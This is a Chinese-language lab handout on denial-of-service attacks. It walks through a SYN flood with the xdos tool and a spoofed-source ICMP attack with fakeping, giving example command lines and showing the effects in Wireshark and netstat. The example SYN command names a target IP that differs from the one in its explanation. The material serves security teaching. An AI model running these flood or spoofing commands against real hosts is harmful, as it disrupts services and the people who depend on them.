拒绝服务攻击 实验
实验内容与步骤:<SYN攻击实验>【实验步骤】一、登录到Windows实验台中登录到Windows实验台,并从实验工具箱取得syn攻击工具XDoc。
二、Windows实验台cmd下运行xdos攻击工具Xdos运行界面如图所示。
Xdos命令举例演示如下:xdos 192.168.1.43 139 –t 3 –s 55.55.55.55172.20.1.19 为被攻击主机的ip地址(实验时请以被攻击主机真实ip为准)139为连接端口-t 3 表示开启的进程-s 后跟的ip地址为syn数据包伪装的源地址的起始地址图1运行显示如图,Windows实验台正在对本地发送syn数据包。
图2在目标主机使用wireshark抓包,如图所示,可以看到大量的syn向172.20.1.19主机发送,并且将源地址改为55.55.55.55后面的ip地址。
图3三、本地主机状态在目标主机使用命令netstat -an查看当前端口状态,如图所示,就会发现大量的syn_received状态的连接,表示172.20.1.19主机接受到syn数据包,但并未受到ack确认数据包,即tcp三次握手的第三个数据包。
图4 查看本地网络状态当多台主机对一台服务器同时进行syn攻击,服务器的运行速度将变得非常缓慢。
<ICMP攻击实验>【实验步骤】(1)启动fakeping从实验箱取得fakeping工具,在本地主机上启动fakeping,如图所示;图5Fakeping使用如下:Fakeping 伪装的源地址(即被攻击主机地址) 目的地址(除本机地址和伪装源地址以外,可以ping通伪装源地址的主机地址)数据包大小举例演示:fakeping 172.20.3.43 172.20.1.7 100在本地主机向172.20.1.7 发送伪装icmp请求信息,请求信息的伪装源地址为172.20.3.43。
如图所示。
图6 攻击过程(2)监听本地主机(172.20.1.7)上的icmp数据包,启动wireshark抓包工具,并设置数据包过滤器为“icmp”:图7图8如图所示,并未收到相应的icmp响应数据包及icmp reply。